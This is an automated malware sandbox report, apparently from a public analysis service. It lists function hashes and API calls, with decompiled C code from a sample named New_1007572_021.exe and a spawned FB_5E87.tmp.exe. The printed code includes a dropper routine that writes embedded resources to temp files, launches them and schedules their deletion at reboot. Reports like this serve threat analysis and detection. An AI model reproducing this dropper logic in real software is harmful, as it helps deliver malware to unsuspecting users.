                                                        • Instruction ID: 470b0d9e377d05a0d49ea4b487c18ff64fd8fab73942f350e33b9dd327561f41
                                                        • Opcode Fuzzy Hash: 3536320ae1fdef111f0cd0253aa74153e0b3b0ec7d9f806b2b871622cdea2b01
                                                        • Instruction Fuzzy Hash: FA7156B0A00B058FDB64DF2AD455B5ABBF1FF88214F008A2DE58AD7A40D774E905CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 010961AC, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 01096269
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 08f56760279fca9bc9eddcf2e471a84835a14f0bffeeb08574da0f43a40cb807
                                                        • Instruction ID: ec2d4dd9ee463c603615bf33ba13210cd670848d874b189aeb69dc18e8f021a5
                                                        • Opcode Fuzzy Hash: 08f56760279fca9bc9eddcf2e471a84835a14f0bffeeb08574da0f43a40cb807
                                                        • Instruction Fuzzy Hash: 944104B1C0075CCBDB24CFA9C884BDEBBB5BF88304F208169D449AB255DB75694ACF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01094C60, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 01096269
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 9a7750e7b0b781057e3678fe424cad006c50a569975ef3fe2f2df5edab10113d
                                                        • Instruction ID: 3400c65f5346870d078d8d03101995f0b254fbb4b79457d2f3d06d5fc408e4bf
                                                        • Opcode Fuzzy Hash: 9a7750e7b0b781057e3678fe424cad006c50a569975ef3fe2f2df5edab10113d
                                                        • Instruction Fuzzy Hash: A84104B0C0475CCBDF24CFA9C88478EBBB5BF48304F208069D509AB255DB75694ACF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109825A, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010982E7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 3ed57fd76ed1d830e47b2b30ecd1e789a706b48186baea0e2954665b6b86e155
                                                        • Instruction ID: 9c5c47b0597a13a09a336936328dba090664771c1f29f2c66c99feb1b029fa48
                                                        • Opcode Fuzzy Hash: 3ed57fd76ed1d830e47b2b30ecd1e789a706b48186baea0e2954665b6b86e155
                                                        • Instruction Fuzzy Hash: 3D21E4B59002089FDB10CFA9D984ADEBBF8FB48324F14845AE954A3310D378AA54CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01098260, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010982E7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: cf8c8cc4af0b06bca915f6da778f8da351ef40dd847ac0d7c7606150e79c3683
                                                        • Instruction ID: 095cf238474b8d9a618d4672dd5cfb1dbf9225f87802278760f9b6a87b35351b
                                                        • Opcode Fuzzy Hash: cf8c8cc4af0b06bca915f6da778f8da351ef40dd847ac0d7c7606150e79c3683
                                                        • Instruction Fuzzy Hash: 0B21F3B59002089FDB10CFAAD884ADEFBF8FB48324F14845AE954A3310C378A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109B508, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0109B369,00000800,00000000,00000000), ref: 0109B57A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: b5075991118c8354bd7333fbc10315a5734f8dd3422740640bd3b1248b025223
                                                        • Instruction ID: 690d014c7cfc59a25a4e0761065666c50bb9229e9a5d5eabbc204a6e1e02320b
                                                        • Opcode Fuzzy Hash: b5075991118c8354bd7333fbc10315a5734f8dd3422740640bd3b1248b025223
                                                        • Instruction Fuzzy Hash: F61103B6D002499FDB10CF9AD844BDEFBF4AB48324F04842AE569A7600C7B4A645CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A3F8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0109B369,00000800,00000000,00000000), ref: 0109B57A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: f343388ce4ee54a255d4c2da4299ed270d47f87fd6029e95b945f911c9482f64
                                                        • Instruction ID: f1048480ecb4de002fa55cfe4f0b6dbbdc4d4922db24c39adaac4e26862f2051
                                                        • Opcode Fuzzy Hash: f343388ce4ee54a255d4c2da4299ed270d47f87fd6029e95b945f911c9482f64
                                                        • Instruction Fuzzy Hash: 111106B6D042088FDB10CF9AD444BDEFBF4EB48324F04846AE559A7200C3B4A945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109B288, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0109B2EE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 1ff36057ea3e48854af7f3a1c271bd8f2c077ee0973ec55367558f1a5a8ab8a3
                                                        • Instruction ID: dba601e353374cef43a20b37ff26fbcd85a7fc9e2bb5a0957948c083dce4b2e9
                                                        • Opcode Fuzzy Hash: 1ff36057ea3e48854af7f3a1c271bd8f2c077ee0973ec55367558f1a5a8ab8a3
                                                        • Instruction Fuzzy Hash: A911E3B5C006498FDB10CF9AD444BDEFBF4EF88324F14846AD869A7610C374A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00EED3EC, Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737306522.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22346511f52c21c5a8bca119bbfe3a2a0190c099041831552b157fd98ab0dc0e
                                                        • Instruction ID: 5dec8f270f77cfc4d849f30857a839ce416d417583ffdf418e95acaf79833349
                                                        • Opcode Fuzzy Hash: 22346511f52c21c5a8bca119bbfe3a2a0190c099041831552b157fd98ab0dc0e
                                                        • Instruction Fuzzy Hash: 7E213AB1508288DFDB04DF11DDC0F26BB65FBA4324F24C579E9095B286C336E856CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00EED4D8, Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737306522.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 62a681197d8df9bd863af39de4ff05daf9dd4e0fb5e55af28c5528e198fe4555
                                                        • Instruction ID: a0a80969ab76ac28cea16f0606bd560fa139a434920a595439049f63ff6f78ba
                                                        • Opcode Fuzzy Hash: 62a681197d8df9bd863af39de4ff05daf9dd4e0fb5e55af28c5528e198fe4555
                                                        • Instruction Fuzzy Hash: 2B2125B1508288DFCB04CF14DDC0B26BB65FB98328F248579E9055B24AC336D85ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0104D01C, Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737457461.000000000104D000.00000040.00000001.sdmp, Offset: 0104D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0c0d32f13badb0d34798ea60a181c5a804078bcca5d879c13ec11fe01c52b88
                                                        • Instruction ID: 0b276513ef5c2c9c29fb9cf6ff860da5419fd875617e24eed2e1df1e9258f4c6
                                                        • Opcode Fuzzy Hash: f0c0d32f13badb0d34798ea60a181c5a804078bcca5d879c13ec11fe01c52b88
                                                        • Instruction Fuzzy Hash: AD2125B1508240DFCB15CF94D8C0B16BBA1FB94354F24C5BDE9894B246C376D806CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0104D2BC, Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737457461.000000000104D000.00000040.00000001.sdmp, Offset: 0104D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b71b3beee91e9f805ed9ba15ee57dbe65585fe84bcec30056d6e130482fb3bcc
                                                        • Instruction ID: 0ab135fbbaac53068e38464ce97121413b1956d769e44fcf2e7d7ef8b6bebb85
                                                        • Opcode Fuzzy Hash: b71b3beee91e9f805ed9ba15ee57dbe65585fe84bcec30056d6e130482fb3bcc
                                                        • Instruction Fuzzy Hash: E9216AF1608240DFD701CF58DAC0B2ABBA5FB94324F24C6BDE9894B246C375E806C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0104D006, Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737457461.000000000104D000.00000040.00000001.sdmp, Offset: 0104D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec361398bb3014714376ce10d0a009f525f9b260ed10c55f36c96b5e936f0ded
                                                        • Instruction ID: 825c5e6716419aa83222f69021bbbc26c2c2aa48f993a060f43e1956a1ef7dc3
                                                        • Opcode Fuzzy Hash: ec361398bb3014714376ce10d0a009f525f9b260ed10c55f36c96b5e936f0ded
                                                        • Instruction Fuzzy Hash: B42192B54083809FCB13CF54D9D4B11BFB1EB46214F28C5EAD8858B257C33AD846CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00EED3E7, Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737306522.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df5f9abf9b8a615514645a4fe399add4613527c191ef26de68862eaed8e9df80
                                                        • Instruction ID: 024b624dbceb71445bda0b63b610ed3ff3100c5ed865e36a2f5a1ddbff355e68
                                                        • Opcode Fuzzy Hash: df5f9abf9b8a615514645a4fe399add4613527c191ef26de68862eaed8e9df80
                                                        • Instruction Fuzzy Hash: 9811E676408284DFCF15CF10D9C4B16BF72FB94324F28C6A9D8085B656C33AE856CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00EED4D3, Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737306522.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df5f9abf9b8a615514645a4fe399add4613527c191ef26de68862eaed8e9df80
                                                        • Instruction ID: cd6166a3c93fb4b5ead088020636851c076c3d73e37b2d9c5cdc13029abe63f8
                                                        • Opcode Fuzzy Hash: df5f9abf9b8a615514645a4fe399add4613527c191ef26de68862eaed8e9df80
                                                        • Instruction Fuzzy Hash: B511E676408284CFCF15CF10D9C4B16BF71FB94328F28C6A9D8051B616C33AD85ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0104D2B7, Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737457461.000000000104D000.00000040.00000001.sdmp, Offset: 0104D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ab319bc5d4cf983ba3a625504d07c5d7e64b3f561c7c7ccfe3826b506edce114
                                                        • Instruction ID: a149c473ea21c6d879337ca738c54e39f211f2b7f92964d76432ca9bc6172fa8
                                                        • Opcode Fuzzy Hash: ab319bc5d4cf983ba3a625504d07c5d7e64b3f561c7c7ccfe3826b506edce114
                                                        • Instruction Fuzzy Hash: F011E3B2504280DFDB12CF14D5C4719FBB1FB85224F28C6BAD8894B642C33AD40ACB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 0109F590, Relevance: .3, Instructions: 315COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7d0dcfda4faf5fff6ea9010c1e9bf370cd77471794450eb047bb90642c35107c
                                                        • Instruction ID: d0bac55277edff46240503d7ec92a311b45ea32bdea017fa60a42105c607230e
                                                        • Opcode Fuzzy Hash: 7d0dcfda4faf5fff6ea9010c1e9bf370cd77471794450eb047bb90642c35107c
                                                        • Instruction Fuzzy Hash: CD1290F94217468BE730CF65F99C2893BE1BB4532CB904208D2652FBD9D7B8118ACF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109E494, Relevance: .3, Instructions: 265COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 30d274547ad69600e6d4df59d53c72f0a0ccb1c0d6be781a0386275365b61d71
                                                        • Instruction ID: 602f6233e2eff9430dcb42069ba9c14424fb4967f5bfda7b75d2169043a94b99
                                                        • Opcode Fuzzy Hash: 30d274547ad69600e6d4df59d53c72f0a0ccb1c0d6be781a0386275365b61d71
                                                        • Instruction Fuzzy Hash: 28A19D32E0020A8FCF15DFA5D8545DEBBF2FF88300B15856AE945AB225EB31AD45DF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109F580, Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7d5b82b838e8e0a564897e1a97cd83ed0420eb50c9df8bed85122435395f0f3f
                                                        • Instruction ID: 3232f2aaddab493fff6ff5d3bb12514c3e99b43d1c36a61ab559b5778373d619
                                                        • Opcode Fuzzy Hash: 7d5b82b838e8e0a564897e1a97cd83ed0420eb50c9df8bed85122435395f0f3f
                                                        • Instruction Fuzzy Hash: 7AC1F5B99217468BD720CF65F99C2893BE1BB8532CF504209D2616FBD8E7B8114ACF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Analysis Process: New_1007572_021.exe PID: 6280 Parent PID: 6688 New_1007572_021.exeCOMMON

                                                        Executed Functions

                                                        Function 00401000, Relevance: 22.6, APIs: 15, Instructions: 119fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 87%
                                                        			E00401000() {
				signed int _t27;
				void* _t32;
				void* _t46;
				long _t53;
				struct HRSRC__* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;

				_t27 = 1;
				 *(_t78 + 0x14) = 1;
				do {
					_t75 = FindResourceA(0, _t27 & 0x0000ffff, 0xa);
					 *(_t78 + 0x18) = _t75;
					if(_t75 != 0) {
						_t53 = SizeofResource(0, _t75);
						_t32 = LoadResource(0, _t75);
						if(_t32 != 0) {
							_t77 = LockResource(_t32);
							if(_t77 != 0) {
								 *((char*)(_t78 + 0x124)) = 0;
								memset(_t78 + 0x125, 0, 0x40 << 2);
								_t79 = _t78 + 0xc;
								asm("stosw");
								asm("stosb");
								 *((char*)(_t79 + 0x20)) = 0;
								memset(_t79 + 0x21, 0, 0x40 << 2);
								_t80 = _t79 + 0xc;
								asm("stosw");
								asm("stosb");
								GetTempPathA(0x104, _t80 + 0x124);
								GetTempFileNameA(_t80 + 0x124, 0x403024, 0, _t80 + 0x20); // executed
								MoveFileExA(_t80 + 0x128, 0, 4); // executed
								 *((intOrPtr*)(_t80 + 0x10)) =  *0x403020;
								 *((intOrPtr*)(_t80 + 0x10)) =  *((intOrPtr*)(_t53 + _t77 - 4));
								sprintf(_t80 + 0x28, 0x403018, _t80 + 0x20, _t80 + 0x10);
								_t78 = _t80 + 0x10;
								_t46 = CreateFileA(_t78 + 0x20, 0x40000000, 2, 0, 2, 0x80, 0); // executed
								_t76 = _t46;
								if(_t76 != 0) {
									WriteFile(_t76, _t77, _t53 + 0xfffffffb, _t78 + 0x1c, 0); // executed
									CloseHandle(_t76);
									ShellExecuteA(0, 0x403010, _t78 + 0x28, 0, 0, 1); // executed
									FreeResource( *(_t78 + 0x18));
									MoveFileExA(_t78 + 0x128, 0, 4); // executed
								}
							}
						}
					}
					_t27 =  *(_t78 + 0x14) + 1;
					 *(_t78 + 0x14) = _t27;
				} while (_t27 < 0x64);
				ExitProcess(0);
			}













                                                        0x00401008
                                                        0x0040100f
                                                        0x00401013
                                                        0x00401023
                                                        0x00401027
                                                        0x0040102b
                                                        0x0040103d
                                                        0x0040103f
                                                        0x00401047
                                                        0x00401054
                                                        0x00401058
                                                        0x0040106c
                                                        0x00401074
                                                        0x00401074
                                                        0x00401076
                                                        0x00401078
                                                        0x00401084
                                                        0x00401089
                                                        0x00401089
                                                        0x0040108b
                                                        0x0040108d
                                                        0x0040109b
                                                        0x004010b5
                                                        0x004010cd
                                                        0x004010d9
                                                        0x004010e5
                                                        0x004010f5
                                                        0x004010fb
                                                        0x00401115
                                                        0x0040111b
                                                        0x0040111f
                                                        0x0040112e
                                                        0x00401135
                                                        0x0040114d
                                                        0x00401158
                                                        0x0040116a
                                                        0x0040116a
                                                        0x0040111f
                                                        0x00401058
                                                        0x00401047
                                                        0x00401170
                                                        0x00401174
                                                        0x00401174
                                                        0x00401180

                                                        APIs
                                                        • FindResourceA.KERNEL32(00000000,00000001,0000000A), ref: 0040101D
                                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00401034
                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040103F
                                                        • LockResource.KERNEL32(00000000,?,?,?,00000000), ref: 0040104E
                                                        • GetTempPathA.KERNEL32(00000104,00000000), ref: 0040109B
                                                        • GetTempFileNameA.KERNELBASE(00000000,00403024,00000000,00000000), ref: 004010B5
                                                        • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004010CD
                                                        • sprintf.MSVCRT ref: 004010F5
                                                        • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00401115
                                                        • WriteFile.KERNELBASE(00000000,00000000,-000000FB,?,00000000,?,?,?,00000000), ref: 0040112E
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00401135
                                                        • ShellExecuteA.SHELL32(00000000,00403010,?,00000000,00000000,00000001), ref: 0040114D
                                                        • FreeResource.KERNEL32(?,?,?,?,00000000), ref: 00401158
                                                        • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040116A
                                                        • ExitProcess.KERNEL32 ref: 00401180
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.740504779.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: FileResource$MoveTemp$CloseCreateExecuteExitFindFreeHandleLoadLockNamePathProcessShellSizeofWritesprintf
                                                        • String ID:
                                                        • API String ID: 797060354-0
                                                        • Opcode ID: 65d69946d058fca2920d4123b4f8b08702cb5f55011c2c6740f72b3e12dceafb
                                                        • Instruction ID: ed3217094a55de5a2dfbc1ddfccbe6b008effd7532ee54a07616082715565e40
                                                        • Opcode Fuzzy Hash: 65d69946d058fca2920d4123b4f8b08702cb5f55011c2c6740f72b3e12dceafb
                                                        • Instruction Fuzzy Hash: E0416671544301ABE3209F60DD49F9B76A8BB88705F000929F785B62D0DAF4D908CBAA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00401190, Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 71%
                                                        			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t39;
				intOrPtr* _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr* _t54;
				intOrPtr _t57;

				_push(0xffffffff);
				_push(0x402080);
				_push(0x401310);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x403040 =  *0x403040 | 0xffffffff;
				 *0x403044 =  *0x403044 | 0xffffffff;
				 *(__p__fmode()) =  *0x40303c;
				 *(__p__commode()) =  *0x403038;
				 *0x403048 = _adjust_fdiv;
				_t27 = E0040130F( *_adjust_fdiv);
				if( *0x403028 == 0) {
					__setusermatherr(E0040130C);
				}
				E004012FA(_t27);
				_push(0x40300c);
				_push(0x403008);
				L004012F4();
				_v112 =  *0x403034;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x403030,  &_v112);
				_push(0x403004);
				_push(0x403000);
				L004012F4();
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while( *_t54 > 0x20) {
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t41 =  *_t54;
					} while (_t41 != 0 && _t41 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t54);
				_push(0);
				_t39 = GetModuleHandleA(0);
				_push(_t39);
				E00401000();
				_v108 = _t39;
				exit(_t39);
				_t40 = _v24;
				_t48 =  *((intOrPtr*)( *_t40));
				_v124 = _t48;
				_push(_t40);
				_push(_t48);
				L004012EE();
				return _t40;
			}























                                                        0x00401193
                                                        0x00401195
                                                        0x0040119a
                                                        0x004011a5
                                                        0x004011a6
                                                        0x004011b3
                                                        0x004011b8
                                                        0x004011bd
                                                        0x004011c4
                                                        0x004011cb
                                                        0x004011de
                                                        0x004011ec
                                                        0x004011f5
                                                        0x004011fa
                                                        0x00401205
                                                        0x0040120c
                                                        0x00401212
                                                        0x00401213
                                                        0x00401218
                                                        0x0040121d
                                                        0x00401222
                                                        0x0040122c
                                                        0x00401245
                                                        0x0040124b
                                                        0x00401250
                                                        0x00401255
                                                        0x00401262
                                                        0x00401264
                                                        0x0040126a
                                                        0x004012a6
                                                        0x004012ab
                                                        0x004012ac
                                                        0x004012ac
                                                        0x0040126c
                                                        0x0040126c
                                                        0x0040126c
                                                        0x0040126d
                                                        0x00401270
                                                        0x00401272
                                                        0x0040127d
                                                        0x0040127f
                                                        0x0040127f
                                                        0x00401280
                                                        0x00401280
                                                        0x0040127d
                                                        0x00401283
                                                        0x00401287
                                                        0x00000000
                                                        0x00000000
                                                        0x0040128d
                                                        0x00401294
                                                        0x0040129e
                                                        0x004012b3
                                                        0x004012a0
                                                        0x004012a0
                                                        0x004012a0
                                                        0x004012b4
                                                        0x004012b5
                                                        0x004012b6
                                                        0x004012b8
                                                        0x004012be
                                                        0x004012bf
                                                        0x004012c4
                                                        0x004012c8
                                                        0x004012ce
                                                        0x004012d3
                                                        0x004012d5
                                                        0x004012d8
                                                        0x004012d9
                                                        0x004012da
                                                        0x004012e1

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.740504779.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                        • String ID:
                                                        • API String ID: 801014965-0
                                                        • Opcode ID: 2c2fb220dff593ef35955992363a28499ee8bc493f74481fad60155688586b38
                                                        • Instruction ID: bb7eaed838f3bdbf73850c04b41ab919ceb6e8f5c29665124cd3a4758e11a842
                                                        • Opcode Fuzzy Hash: 2c2fb220dff593ef35955992363a28499ee8bc493f74481fad60155688586b38
                                                        • Instruction Fuzzy Hash: 63414CB1801344AFDB20DFA4DA49AAA7BBCBB09711F20017FE941B72E1C7784941CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Analysis Process: FB_5E87.tmp.exe PID: 6344 Parent PID: 6280 FB_5E87.tmp.exeCOMMON

                                                        Executed Functions

                                                        Function 0108ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0108ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0109C810(_a8,  &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0109CC30(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0109CEB0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0109B060(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                        0x0108acdc
                                                        0x0108acdf
                                                        0x0108ace4
                                                        0x0108ace9
                                                        0x0108acf3
                                                        0x0108acf8
                                                        0x0108acfb
                                                        0x0108acfd
                                                        0x0108ad05
                                                        0x0108ad0a
                                                        0x0108ad0a
                                                        0x0108ad11
                                                        0x0108ad19
                                                        0x0108ad1c
                                                        0x0108ad1e
                                                        0x0108ad32
                                                        0x00000000
                                                        0x0108ad34
                                                        0x0108ad3a
                                                        0x0108acee
                                                        0x0108acee
                                                        0x0108acee

                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0108AD32
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                        • Instruction ID: 5838d71bf27bce1d29a6f5f8f6d99d826cd8c2253c6da7868460fb43a20a9bc5
